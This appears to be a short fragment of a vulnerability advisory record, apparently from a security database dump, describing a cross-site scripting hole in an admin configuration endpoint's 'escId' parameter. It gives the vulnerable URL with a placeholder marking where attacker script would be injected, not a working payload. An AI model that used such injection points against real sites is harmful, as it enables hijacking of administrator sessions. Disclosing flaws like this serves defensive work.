[XSS]\r\n\r\nhttp://www.example.com/admin/config/Config.do?mode=escalate&escId=[INCLUDE CLIENT_SIDE SCRIPTCODE HERE!!!]\r\n\r\nReferences:\r\nhttp://www.example.com/admin/config/Config.do?mode=escalate&escId=", "osvdbidlist": []}